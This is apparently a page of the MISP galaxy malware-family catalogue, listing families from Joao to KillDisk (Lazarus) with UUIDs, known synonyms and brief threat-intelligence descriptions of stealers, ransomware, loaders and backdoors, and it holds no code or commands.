Joao

Internal MISP references

UUID 8201c8d2-1dab-4473-bbdf-42952b3d5fc6 which can be used as unique global reference for Joao in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.JobCrypter

Internal MISP references

UUID 30c047ea-27c9-4b01-8532-bcaa661be85f which can be used as unique global reference for win.JobCrypter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jolob

Internal MISP references

UUID 97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631 which can be used as unique global reference for Jolob in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JQJSNICKER

Internal MISP references

UUID 2e457b93-de45-4b1d-8e1d-b8d19c2c555a which can be used as unique global reference for JQJSNICKER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JripBot

Internal MISP references

UUID e895a0d2-fe4b-4793-9440-9db2d56a97f2 which can be used as unique global reference for JripBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JSOutProx

JSOutProx is a sophisticated attack framework built using both Javascript and .NET. It uses the .NET (de)serialization feature to interact with a Javascript file which is the core module running on a victim machine. Once the malware is run on the victim, the framework can load several plugins performing additional malicious activities on the target.

Internal MISP references

UUID 5e4fbe90-c043-4ac3-9fd5-d9e7d9bb173f which can be used as unique global reference for JSOutProx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JSSLoader

Internal MISP references

UUID 5db89188-568d-40d2-9320-5fb4a06fbd51 which can be used as unique global reference for JSSLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JuicyPotato

As described on the Github repository page, "A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM".

Internal MISP references

UUID 4dc0dccf-ac68-4464-b193-6519ffe00617 which can be used as unique global reference for JuicyPotato in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JUMPALL

According to FireEye, JUMPALL is a malware dropper that has been observed dropping HIGHNOON/ZXSHELL/SOGU.

Internal MISP references

UUID a08db33d-4c37-4075-bd49-c3ab66a339db which can be used as unique global reference for JUMPALL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jupiter

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Jupiter.

Known Synonyms
`EarlyRAT`

Internal MISP references

UUID 47baaed8-073c-4a13-92dc-434210ea3cd0 which can be used as unique global reference for Jupiter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KAgent

Internal MISP references

UUID eab42a8e-22e7-49e4-8a26-44f14b6f67bb which can be used as unique global reference for KAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kami

A Telegram bot with browser stealing capabilities, written using the .NET framework.

Internal MISP references

UUID d78ade16-d038-44b6-adfa-2439dcaf4d87 which can be used as unique global reference for Kami in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kapeka

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kapeka.

Known Synonyms
`ICYWELL`
`KNUCKLETOUCH`
`QUEUESEED`
`WRONGSENS`

Internal MISP references

UUID f1a916da-ae8f-4a09-94cf-b93b6443d421 which can be used as unique global reference for Kapeka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Karagany

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karagany.

Known Synonyms
`Karagny`

Internal MISP references

UUID 857e61fe-ccb2-426b-ad7b-696112f48dbb which can be used as unique global reference for Karagany in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kardon Loader

According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.

Internal MISP references

UUID 8b33ba21-9af7-4536-bd02-23dd863147e8 which can be used as unique global reference for Kardon Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Karius

According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.

It comes with an injector that loads an intermediate "proxy" component, which in turn loads the actual banker component.

Communication with the c2 are in json format and encrypted with RC4 with a hardcoded key.

In the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.

Internal MISP references

UUID 8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf which can be used as unique global reference for Karius in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Karkoff

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karkoff.

Known Synonyms
`CACTUSPIPE`
`MailDropper`
`OILYFACE`

Internal MISP references

UUID a45c16d9-6945-428c-af46-0436903f9329 which can be used as unique global reference for Karkoff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Karma

Ransomware.

Internal MISP references

UUID 2667c9a6-4811-4535-95a1-3b75ba853a03 which can be used as unique global reference for Karma in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KasperAgent

Internal MISP references

UUID d9c14095-8885-406c-b56b-06f3a1a88c1c which can be used as unique global reference for KasperAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kasseika

Trend Micro describes this as a Ransomware with possible ties to BlackMatter.

Internal MISP references

UUID 5042b9a3-e0f1-4807-9e54-779e5de17beb which can be used as unique global reference for Kasseika in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kazuar

Internal MISP references

UUID bab92070-3589-4b7e-bf05-4f54bfefc2ca which can be used as unique global reference for Kazuar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KazyLoader

According to Karsten Hahn, a straightforward loader that runs assemblies from images.

Internal MISP references

UUID a6f86df6-d822-4143-bdfe-149e70bcf1a0 which can be used as unique global reference for KazyLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KDC Sponge

Internal MISP references

UUID 77c4a0e7-7ee1-446a-bc5d-8dd596d9d5fc which can be used as unique global reference for KDC Sponge in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kegotip

Internal MISP references

UUID 96bb088c-7bb7-4a07-a9d7-a3cbb45d5755 which can be used as unique global reference for Kegotip in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KEKW

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KEKW.

Known Synonyms
`KEKW-Locker`

Internal MISP references

UUID b178de96-14a3-49f1-a957-c83f86e23e83 which can be used as unique global reference for KEKW in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kelihos

Internal MISP references

UUID 7d69892e-d582-4545-8798-4a9a84a821ea which can be used as unique global reference for Kelihos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kematian Stealer

Stealer written in Python, available as open source on Github.

Internal MISP references

UUID e03bdd1c-42cc-4483-ac2d-177ed62a0cf5 which can be used as unique global reference for Kematian Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Keona

Internal MISP references

UUID b74ad48b-ac26-4748-adac-b824defbe315 which can be used as unique global reference for Keona in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KerrDown

Internal MISP references

UUID bd9e21d1-7da3-4699-816f-0e368a63bc18 which can be used as unique global reference for KerrDown in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ketrican

Ketrican is a backdoor trojan used by APT 15.

Internal MISP references

UUID 86cd2563-b343-4cce-ac2d-a17afbc77dfd which can be used as unique global reference for Ketrican in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ketrum

Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.

Internal MISP references

UUID 99d6cb80-bae2-4a97-8ec7-401f9570f237 which can be used as unique global reference for Ketrum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KeyBase

KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KeyBase.

Known Synonyms
`Kibex`

Internal MISP references

UUID 8a7bb20e-7e90-4330-8f53-744bd5519f6f which can be used as unique global reference for KeyBase in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KeyBoy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KeyBoy.

Known Synonyms
`TSSL`

Internal MISP references

UUID 28c13455-7f95-40a5-9568-1e8732503507 which can be used as unique global reference for KeyBoy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Keyhole

According to Walmart Global Tech, Keyhole is a multi-functional VNC/Backconnect component used extensively by IcedID/Anubis. While the malware contains functionality that has been previously reported on as typical VNC and HDESK capabilities, a general lack of technical information appears to exist around some of the expanded functionality currently present.

Internal MISP references

UUID 283dcc47-975a-402c-9dd8-b2d5f7d9eee7 which can be used as unique global reference for Keyhole in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

APT3 Keylogger

Internal MISP references

UUID 68039fbe-2eee-4666-b809-32a011e9852a which can be used as unique global reference for APT3 Keylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KEYMARBLE

Internal MISP references

UUID 0c213d7f-8c71-4341-aeb0-13be71fbf4e5 which can be used as unique global reference for KEYMARBLE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KGH_SPY

Internal MISP references

UUID d073b11a-a941-48b9-8e88-b59ffab9fcda which can be used as unique global reference for KGH_SPY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Khonsari

A compact ransomware written in .NET and delivered as follow-up to Log4J exploitation, targeting Windows servers.

Internal MISP references

UUID 76a7c43f-73d7-4f4f-acac-1fcaa150bf72 which can be used as unique global reference for Khonsari in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KHRAT

According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

Internal MISP references

UUID 361d3f09-8bc8-4b5a-803f-8686cf346047 which can be used as unique global reference for KHRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kikothac

Internal MISP references

UUID f2ca304f-6577-4f3a-983c-beec447a9493 which can be used as unique global reference for Kikothac in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KillAV

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KillAV.

Known Synonyms
`BURNTCIGAR`

Internal MISP references

UUID ad6ac685-e13f-4522-9805-644f82818347 which can be used as unique global reference for KillAV in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KillDisk

KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them.

Internal MISP references

UUID e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027 which can be used as unique global reference for KillDisk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KilllSomeOne

Internal MISP references

UUID 4d431d90-9dd5-4a77-9084-c010d6504f78 which can be used as unique global reference for KilllSomeOne in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KimJongRat

Internal MISP references

UUID 61edd17b-322d-45dc-a6a0-31c13ec2338e which can be used as unique global reference for KimJongRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kimsuky

Internal MISP references

UUID 860643d6-5693-4e4e-ad1f-56c49faa10a7 which can be used as unique global reference for Kimsuky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kingminer

According to Sophis, the botnet has been active since 2018, initially, the botmasters operated DDoS tools and backdoors, but later moved on to cryptocurrency miners. They use a DGA to automatically change the hosting domains every week.

Internal MISP references

UUID 04d95343-fd44-471d-bfe7-908994a98ea7 which can be used as unique global reference for Kingminer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KINS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KINS.

Known Synonyms
`Kasper Internet Non-Security`
`Maple`

Internal MISP references

UUID 07f6bbff-a09a-4580-96ea-62795a8dae11 which can be used as unique global reference for KINS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KIVARS (Windows)

Internal MISP references

UUID 6c585194-96d3-463d-ac21-aa942439cc26 which can be used as unique global reference for KIVARS (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Klackring

Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.

Internal MISP references

UUID 03a4eb90-8d88-49c7-a973-2201115ea5a8 which can be used as unique global reference for Klackring in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KleptoParasite Stealer

KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.

PDB-strings suggest a relationship to JogLog v6 and v7.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KleptoParasite Stealer.

Known Synonyms
`Joglog`
`Parasite`

Internal MISP references

UUID 618b6f23-fc83-4aff-8b0a-7f7138be625c which can be used as unique global reference for KleptoParasite Stealer in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer - webarchive

Associated metadata

Metadata key	Value
type	[]

KlingonRAT

Internal MISP references

UUID 5f501884-2c72-4780-aaa6-c6b65e84fad8 which can be used as unique global reference for KlingonRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KLogEXE

Internal MISP references

UUID c71d0fcd-618d-49a5-a1e1-607e275a7ada which can be used as unique global reference for KLogEXE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KLRD

Internal MISP references

UUID 70459959-5a20-482e-b714-2733f5ff310e which can be used as unique global reference for KLRD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Knight

According to Symantec, this is a ransomware written in Golang and obfuscated with Gobfuscate. The source code for Knight (originally known as Cyclops) was offered for sale on underground forums in February 2024 after Knight’s developers decided to shut down their operation.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Knight.

Known Synonyms
`Cyclops`

Internal MISP references

UUID 1b251f88-4a9d-4edf-89d9-50c30d989a6f which can be used as unique global reference for Knight in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Knot

Ransomware.

Internal MISP references

UUID 0479b7cd-982e-430e-a96e-338aec8ae3cf which can be used as unique global reference for Knot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Koadic

Koadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and can generate JScript and VBScript payloads which can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect specific system information and targeted files based on their name or extension.

Internal MISP references

UUID 3b5faa15-e87e-4aaf-b791-2c5e593793e6 which can be used as unique global reference for Koadic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Koi Loader

Internal MISP references

UUID 4163e613-40a0-4ca5-8ed2-2f014eb64bb3 which can be used as unique global reference for Koi Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Koi Stealer

Internal MISP references

UUID 9f6e745e-086b-4126-bc21-6e2a83115ddc which can be used as unique global reference for Koi Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KoiVM

A loader written in .NET.

Internal MISP references

UUID 4b7c6af1-1980-452f-9405-e42d0066ff2d which can be used as unique global reference for KoiVM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KokoKrypt

Internal MISP references

UUID f7674d06-450a-4150-9180-afef94cce53c which can be used as unique global reference for KokoKrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KOMPROGO

KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KOMPROGO.

Known Synonyms
`Splinter RAT`

Internal MISP references

UUID 116f4c5f-fd51-4e90-995b-f16c46523c06 which can be used as unique global reference for KOMPROGO in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Konni (Windows)

Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.

Internal MISP references

UUID f982fa2d-f78f-4fe1-a86d-d10471a3ebcf which can be used as unique global reference for Konni (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KoobFace

Internal MISP references

UUID 9430ce27-c8c5-44fb-9255-47d76a8903b3 which can be used as unique global reference for KoobFace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Korlia

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Korlia.

Known Synonyms
`Bisonal`

Internal MISP references

UUID 52d98d2f-db62-430d-8658-5cadaeff6cd7 which can be used as unique global reference for Korlia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kovter

Kovter is a Police Ransomware

Feb 2012 - Police Ransomware Aug 2013 - Became AD Fraud Mar 2014 - Ransomware to AD Fraud malware June 2014 - Distributed from sweet orange exploit kit Dec 2014 - Run affiliated node Apr 2015 - Spread via fiesta and nuclear pack May 2015 - Kovter become fileless 2016 - Malvertising campaign on Chrome and Firefox June 2016 - Change in persistence July 2017 - Nemucod and Kovter was packed together Jan 2018 - Cyclance report on Persistence

Internal MISP references

UUID af3a0643-7a80-4b8f-961b-aea18e78715e which can be used as unique global reference for Kovter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KPOT Stealer

KPOT is an information-stealing Trojan horse that can steal information from infected computers. It is distributed through phishing emails and malicious websites. Once executed on a computer, KPOT can steal passwords, credit card numbers, and other personal information.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KPOT Stealer.

Known Synonyms
`Khalesi`
`Kpot`

Internal MISP references

UUID b1fe4226-1783-48d4-b1d2-417703a03b3d which can be used as unique global reference for KPOT Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Krachulka

According to ESET, this malware family is a banking trojan and was active in Brazil until the middle of 2019. Its most noticeable characteristic was its usage of well-known cryptographic methods to encrypt strings, as opposed to the majority of Latin American banking trojans that mainly use custom encryption schemes.

Internal MISP references

UUID 1ddcb067-e876-4eff-8bb7-e28c089d99a3 which can be used as unique global reference for Krachulka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kraken

A ransomware that was active in 2018.

Internal MISP references

UUID 3d7ae6b9-8161-470e-a7b6-752151b21657 which can be used as unique global reference for Kraken in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KrakenKeylogger

KrakenKeylogger is a .NET based Infostealer malware sold in Underground hacking forums

Internal MISP references

UUID 6b15469a-64ff-4edc-99dd-60f7a277d5c1 which can be used as unique global reference for KrakenKeylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KrBanker

ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KrBanker.

Known Synonyms
`BlackMoon`

Internal MISP references

UUID f4008c19-e81a-492a-abfe-f177e1ac5bce which can be used as unique global reference for KrBanker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KrDownloader

Internal MISP references

UUID c346faf0-9eb4-4f8a-8547-30e6641b8972 which can be used as unique global reference for KrDownloader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader - webarchive

Associated metadata

Metadata key	Value
type	[]

Kronos

Kronos malware is a sophisticated banking Trojan that first emerged in 2014. It is designed to target financial institutions and steal sensitive banking information. The malware is primarily spread through phishing campaigns and exploit kits. Once installed on a victim's computer, Kronos can capture login credentials, credit card details, and other personal information by keylogging and form grabbing techniques. It can also bypass security measures such as two-factor authentication. Kronos employs advanced evasion techniques to avoid detection by antivirus software and actively updates itself to evade security patches. It has been known to target a wide range of banking systems and has affected numerous organizations worldwide. The malware continues to evolve, making it a significant threat to online banking security.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kronos.

Known Synonyms
`Osiris`

Internal MISP references

UUID 62a7c823-9af0-44ee-ac05-8765806d2a17 which can be used as unique global reference for Kronos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KryptoCibule

Internal MISP references

UUID 8039c56c-3be1-4344-81cf-6c21b06bbaa6 which can be used as unique global reference for KryptoCibule in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KSL0T

A keylogger used by Turla.

Internal MISP references

UUID aa93d030-abef-4215-bc9e-6c7483562d19 which can be used as unique global reference for KSL0T in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KTLVdoor (Windows)

According to Trend Micro, KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning.

Internal MISP references

UUID c9d1948b-1db0-4d99-8a25-c2deb7e0030c which can be used as unique global reference for KTLVdoor (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kuaibu

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kuaibu.

Known Synonyms
`Barys`
`Gofot`
`Kuaibpy`

Internal MISP references

UUID 7d8943a4-b710-48d3-9352-e9b42516d2b7 which can be used as unique global reference for Kuaibu in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8 - webarchive

Associated metadata

Metadata key	Value
type	[]

Kuiper (Windows)

Internal MISP references

UUID 3b8fb979-154f-434e-8bc1-a2836d9defe9 which can be used as unique global reference for Kuiper (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kuluoz

Internal MISP references

UUID f9b3757e-99c7-4999-8b79-87609407f895 which can be used as unique global reference for Kuluoz in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz - webarchive

Associated metadata

Metadata key	Value
type	[]

Kurton

Internal MISP references

UUID 1fc49b8c-647a-4484-a2f6-e6f2311f8b58 which can be used as unique global reference for Kurton in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kutaki

Cofense characterizes Kutaki as a data stealer that uses old-school techniques to detect sandboxes and debugging. Kutaki however works quite well against unhardened virtual machines and other analysis devices. By backdooring a legitimate application, it can fool unsophisticated detection methodologies.

Internal MISP references

UUID ff40299b-dc45-4a1c-bfe2-3864682b8fea which can be used as unique global reference for Kutaki in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kwampirs

Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes "q=[ENCRYPTED DATA]" in the URI.

Internal MISP references

UUID 2fc93875-eebb-41ff-a66e-84471c6cd5a3 which can be used as unique global reference for Kwampirs in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ladon

According to its self-description, Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning.

Internal MISP references

UUID 5c63623b-aa84-41a5-9e3e-f338edf72291 which can be used as unique global reference for Ladon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LALALA Stealer

Internal MISP references

UUID 62f1846f-3026-4824-b739-8f9ae5e9c8bb which can be used as unique global reference for LALALA Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lambert (Windows)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lambert (Windows).

Known Synonyms
`Plexor`

Internal MISP references

UUID 3af9397a-b4f7-467d-93af-b3d77dcfc38d which can be used as unique global reference for Lambert (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LambLoad

According to Microsoft, this is a downloader used in a supply chain attack involving a malicious variant of an application developed by CyberLink. It is centered around a legitimate CyberLink application installer that has been modified to include malicious code that downloads, decrypts, and loads a second-stage payload. The file, which was signed using a valid certificate issued to CyberLink Corp., is hosted on legitimate update infrastructure owned by CyberLink and includes checks to limit the time window for execution and evade detection by security products.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LambLoad.

Known Synonyms
`OfficeCertTea`

Internal MISP references

UUID a67f59fd-92dc-43b0-b9df-220384dbe5a4 which can be used as unique global reference for LambLoad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lamdelin

Internal MISP references

UUID da79cf10-df9f-4cd3-bbce-ae9f357633f0 which can be used as unique global reference for Lamdelin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LaplasClipper

Clipboard stealer.

Internal MISP references

UUID cc2c0c2a-b233-4d51-9e0a-ae91043c952c which can be used as unique global reference for LaplasClipper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LatentBot

FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

Using Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.

Internal MISP references

UUID 7fc74551-013f-4dd1-8da9-9266edcc45d0 which can be used as unique global reference for LatentBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Latrodectus

First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Latrodectus.

Known Synonyms
`BLACKWIDOW`
`IceNova`
`Latrodectus`
`Lotus`

Internal MISP references

UUID 841bb886-8c75-427f-9b57-537c546557e1 which can be used as unique global reference for Latrodectus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Laturo Stealer

Internal MISP references

UUID e1958a69-49c3-43a2-ba80-6e5cd5bbcd13 which can be used as unique global reference for Laturo Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LazarDoor

Internal MISP references

UUID 1045b4f1-5a85-4448-a7a9-abc964bdae72 which can be used as unique global reference for LazarDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LazarLoader

Internal MISP references

UUID 42bce8d3-8705-44fb-bd88-4af16c6bd28f which can be used as unique global reference for LazarLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KillDisk (Lazarus)

Synonyms

